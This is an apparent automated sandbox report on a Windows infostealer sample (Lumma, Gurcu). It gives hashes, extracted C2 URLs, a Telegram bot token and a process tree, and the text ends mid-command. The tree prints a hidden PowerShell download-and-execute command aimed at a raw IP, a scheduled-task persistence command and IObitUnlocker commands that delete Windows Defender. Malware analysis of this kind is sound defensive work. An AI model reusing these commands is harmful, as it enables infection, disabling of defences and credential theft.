Overview

overview

10

Static

static

5

2025-06-26...er.exe

windows10-2004-x64

10

2025-06-26...er.exe

windows11-21h2-x64

10

Analysis

  • max time kernel
    140s
  • max time network
    161s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250610-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250610-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26/06/2025, 09:37

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    2025-06-26_21540af7452569fc839d3b2babe2c261_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe

  • Size

    938KB

  • MD5

    21540af7452569fc839d3b2babe2c261

  • SHA1

    008e0bc7c2e611464560fb1c77579efd0e1dd264

  • SHA256

    0490e90753356ad71f452357930a08137faec255ee5d4ed56dd21a19ede79bf5

  • SHA512

    fba778135b8ca9ccaa2336fa68e21858e45057893f9b831fb5db852b549054776dc5e019c8e16ea962db6bee49a686ba6b7d36be830141ac6d75fb0c1395cd30

  • SSDEEP

    24576:FqDEvCTbMWu7rQYlBQcBiT6rprG8a9sv:FTvC/MTQYxsWR7a9s

Score
10/10
gurculummacollectiondefense_evasiondiscoveryexecutionpersistencespywarestealer

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.156.72.2/testmine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.156.72.2/testmine/random.exe

Extracted

Family

lumma

C2

https://equidn.xyz/xapq/api

https://gewgb.xyz/axgh/api

https://skjgx.xyz/riuw/api

https://ropyi.xyz/zadf/api

https://spjeo.xyz/axka/api

https://baviip.xyz/twiw/api

https://shaeb.xyz/ikxz/api

https://firddy.xyz/yhbc/api

https://trqqe.xyz/xudu/api

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU/sendMessage?chat_id=6299414420

Signatures

  • Gurcu family
    gurcu
  • Gurcu, WhiteSnake

    Gurcu aka WhiteSnake is a malware stealer written in C#.

    stealergurcu
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

    stealerlumma
  • Lumma family
    lumma
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
    defense_evasion
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Downloads MZ/PE file 15 IoCs
  • Sets service image path in registry 2 TTPs 3 IoCs
    persistence
  • Stops running service(s) 4 TTPs
    defense_evasionexecution
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 14 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 64 IoCs
  • Identifies Wine through registry keys 2 TTPs 1 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Loads dropped DLL 43 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Accesses Microsoft Outlook profiles 1 TTPs 42 IoCs
    collection
  • Adds Run key to start application 2 TTPs 4 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
    discovery
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe 12 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Delays execution with timeout.exe 2 IoCs
    defense_evasion
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Kills process with taskkill 4 IoCs
    defense_evasion
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 33 IoCs
  • Suspicious use of FindShellTrayWindow 12 IoCs
  • Suspicious use of SendNotifyMessage 9 IoCs
  • Suspicious use of SetWindowsHookEx 43 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:608
      • C:\Windows\system32\control.exe
        C:\Windows\system32\control.exe
        2⤵
          PID:1396
          • C:\Windows\system32\control.exe
            C:\Windows\system32\control.exe
            3⤵
              PID:5384
        • C:\Users\Admin\AppData\Local\Temp\2025-06-26_21540af7452569fc839d3b2babe2c261_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe
          "C:\Users\Admin\AppData\Local\Temp\2025-06-26_21540af7452569fc839d3b2babe2c261_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe"
          1⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:3928
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c schtasks /create /tn pYClLmal34e /tr "mshta C:\Users\Admin\Desktop\m1XO5qjHr.hta" /sc minute /mo 10 /ru "Admin" /f
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2492
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /tn pYClLmal34e /tr "mshta C:\Users\Admin\Desktop\m1XO5qjHr.hta" /sc minute /mo 10 /ru "Admin" /f
              3⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:3676
          • C:\Windows\SysWOW64\mshta.exe
            mshta C:\Users\Admin\Desktop\m1XO5qjHr.hta
            2⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:2768
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:APPDATA+'BQCIJETUWMBNKI184FGZ9UFDLYLKWLVH.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.156.72.2/testmine/random.exe',$d);Start-Process $d;
              3⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Downloads MZ/PE file
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:5976
              • C:\Users\Admin\AppData\RoamingBQCIJETUWMBNKI184FGZ9UFDLYLKWLVH.EXE
                "C:\Users\Admin\AppData\RoamingBQCIJETUWMBNKI184FGZ9UFDLYLKWLVH.EXE"
                4⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2028
                • C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe
                  "C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe"
                  5⤵
                  • Downloads MZ/PE file
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:2164
                  • C:\Users\Admin\AppData\Local\Temp\10495460101\index.exe
                    "C:\Users\Admin\AppData\Local\Temp\10495460101\index.exe"
                    6⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:5788
                    • C:\Temper\qUQ9sZlz.exe
                      "C:\Temper\qUQ9sZlz.exe"
                      7⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      • Suspicious use of WriteProcessMemory
                      PID:5396
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd.exe /c ""C:\Temper\5Suk4e8N.exe" x -aoa -bso0 -bsp1 "C:\Temper\fhYewhdX.zip" -pc5Llr4Er -o"C:\Temper""
                        8⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of WriteProcessMemory
                        PID:5452
                        • C:\Temper\5Suk4e8N.exe
                          "C:\Temper\5Suk4e8N.exe" x -aoa -bso0 -bsp1 "C:\Temper\fhYewhdX.zip" -pc5Llr4Er -o"C:\Temper"
                          9⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5036
                      • C:\Temper\TvKmbSZy.exe
                        "C:\Temper\TvKmbSZy.exe"
                        8⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:5232
                      • C:\Temper\HDfPAHEn.exe
                        "C:\Temper\HDfPAHEn.exe"
                        8⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:1516
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\y2surjz.bat" "
                          9⤵
                          • Suspicious use of WriteProcessMemory
                          PID:4048
                          • C:\Users\Admin\AppData\Local\Temp\Work\nircmd.exe
                            nircmd win min process "cmd.exe"
                            10⤵
                            • Executes dropped EXE
                            PID:3236
                          • C:\Windows\SysWOW64\chcp.com
                            chcp 65001
                            10⤵
                            • System Location Discovery: System Language Discovery
                            PID:2232
                          • C:\Windows\SysWOW64\reg.exe
                            reg query "HKU\S-1-5-19"
                            10⤵
                              PID:2564
                            • C:\Windows\SysWOW64\reg.exe
                              reg add "HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize" /v "AppsUseLightTheme" /t reg_dword /d 0 /f
                              10⤵
                              • System Location Discovery: System Language Discovery
                              • Modifies data under HKEY_USERS
                              PID:4896
                            • C:\Users\Admin\AppData\Local\Temp\Work\NSudoLG.exe
                              NSudoLG -U:T -P:E -UseCurrentConsole "C:\Users\Admin\AppData\Local\Temp\y2surjz.bat" any_word
                              10⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4948
                            • C:\Windows\SysWOW64\mode.com
                              Mode 79,49
                              10⤵
                              • System Location Discovery: System Language Discovery
                              PID:3304
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c ver
                              10⤵
                                PID:1384
                              • C:\Windows\SysWOW64\reg.exe
                                reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA"
                                10⤵
                                • System Location Discovery: System Language Discovery
                                PID:1592
                              • C:\Windows\SysWOW64\find.exe
                                find /i "0x0"
                                10⤵
                                  PID:5952
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c tasklist
                                  10⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2540
                                  • C:\Windows\SysWOW64\tasklist.exe
                                    tasklist
                                    11⤵
                                    • Enumerates processes with tasklist
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3676
                                • C:\Windows\SysWOW64\reg.exe
                                  reg query "HKLM\System\CurrentControlSet\Services\WinDefend"
                                  10⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4700
                                • C:\Windows\SysWOW64\reg.exe
                                  reg query "HKLM\System\CurrentControlSet\Services\MDCoreSvc"
                                  10⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4708
                                • C:\Windows\SysWOW64\reg.exe
                                  reg query "HKLM\System\CurrentControlSet\Services\WdNisSvc"
                                  10⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:5536
                                • C:\Windows\SysWOW64\reg.exe
                                  reg query "HKLM\System\CurrentControlSet\Services\Sense"
                                  10⤵
                                    PID:2156
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg query "HKLM\System\CurrentControlSet\Services\wscsvc"
                                    10⤵
                                      PID:536
                                    • C:\Windows\SysWOW64\reg.exe
                                      reg query "HKLM\System\CurrentControlSet\Services\SgrmBroker"
                                      10⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1760
                                    • C:\Windows\SysWOW64\reg.exe
                                      reg query "HKLM\System\CurrentControlSet\Services\SecurityHealthService"
                                      10⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:816
                                    • C:\Windows\SysWOW64\reg.exe
                                      reg query "HKLM\System\CurrentControlSet\Services\webthreatdefsvc"
                                      10⤵
                                        PID:4832
                                      • C:\Windows\SysWOW64\reg.exe
                                        reg query "HKLM\System\CurrentControlSet\Services\webthreatdefusersvc"
                                        10⤵
                                          PID:2292
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg query "HKLM\System\CurrentControlSet\Services\WdNisDrv"
                                          10⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:3908
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg query "HKLM\System\CurrentControlSet\Services\WdBoot"
                                          10⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:5504
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg query "HKLM\System\CurrentControlSet\Services\WdFilter"
                                          10⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:1732
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg query "HKLM\System\CurrentControlSet\Services\SgrmAgent"
                                          10⤵
                                            PID:5176
                                          • C:\Windows\SysWOW64\reg.exe
                                            reg query "HKLM\System\CurrentControlSet\Services\MsSecWfp"
                                            10⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:2508
                                          • C:\Windows\SysWOW64\reg.exe
                                            reg query "HKLM\System\CurrentControlSet\Services\MsSecFlt"
                                            10⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:2016
                                          • C:\Windows\SysWOW64\reg.exe
                                            reg query "HKLM\System\CurrentControlSet\Services\MsSecCore"
                                            10⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:4604
                                          • C:\Windows\SysWOW64\reg.exe
                                            reg query HKLM\System\CurrentControlset\Services\WdFilter
                                            10⤵
                                            • System Location Discovery: System Language Discovery
                                            • Modifies registry key
                                            PID:4284
                                          • C:\Windows\SysWOW64\reg.exe
                                            reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v "ProductName"
                                            10⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:4256
                                          • C:\Windows\SysWOW64\find.exe
                                            find /i "Windows 7"
                                            10⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:4440
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /S /D /c" ver "
                                            10⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:5264
                                          • C:\Windows\SysWOW64\findstr.exe
                                            findstr /c:"6.1.7601"
                                            10⤵
                                              PID:5936
                                            • C:\Users\Admin\AppData\Local\Temp\Work\7z.exe
                                              7z x -aoa -bso0 -bsp1 "DKT.zip" -p"DDK" "Unlocker.exe"
                                              10⤵
                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4036
                                            • C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe
                                              Unlocker /CurrentDiskSize
                                              10⤵
                                              • Checks computer location settings
                                              • Executes dropped EXE
                                              PID:4720
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /c sc query IObitUnlocker
                                                11⤵
                                                  PID:700
                                                  • C:\Windows\system32\sc.exe
                                                    sc query IObitUnlocker
                                                    12⤵
                                                    • Launches sc.exe
                                                    PID:4336
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /c taskkill /f /pid "4720"
                                                  11⤵
                                                    PID:5204
                                                    • C:\Windows\system32\taskkill.exe
                                                      taskkill /f /pid "4720"
                                                      12⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2112
                                                • C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe
                                                  Unlocker /dеlwd
                                                  10⤵
                                                  • Sets service image path in registry
                                                  • Checks computer location settings
                                                  • Executes dropped EXE
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:5196
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c sc query IObitUnlocker
                                                    11⤵
                                                      PID:5712
                                                      • C:\Windows\system32\sc.exe
                                                        sc query IObitUnlocker
                                                        12⤵
                                                        • Launches sc.exe
                                                        PID:4556
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /c sc stop IObitUnlocker & sc delete IObitUnlocker
                                                      11⤵
                                                        PID:3400
                                                        • C:\Windows\system32\sc.exe
                                                          sc stop IObitUnlocker
                                                          12⤵
                                                          • Launches sc.exe
                                                          PID:2184
                                                        • C:\Windows\system32\sc.exe
                                                          sc delete IObitUnlocker
                                                          12⤵
                                                          • Launches sc.exe
                                                          PID:3760
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /c taskkill /f /pid "5196"
                                                        11⤵
                                                          PID:6128
                                                          • C:\Windows\system32\taskkill.exe
                                                            taskkill /f /pid "5196"
                                                            12⤵
                                                            • Kills process with taskkill
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2928
                                                      • C:\Windows\SysWOW64\timeout.exe
                                                        timeout /t 2 /nobreak
                                                        10⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • Delays execution with timeout.exe
                                                        PID:1736
                                                      • C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe
                                                        Unlocker /DеlWD
                                                        10⤵
                                                        • Sets service image path in registry
                                                        • Checks computer location settings
                                                        • Executes dropped EXE
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4388
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c sc query IObitUnlocker
                                                          11⤵
                                                            PID:220
                                                            • C:\Windows\system32\sc.exe
                                                              sc query IObitUnlocker
                                                              12⤵
                                                              • Launches sc.exe
                                                              PID:6120
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:4876
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:3244
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:1796
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 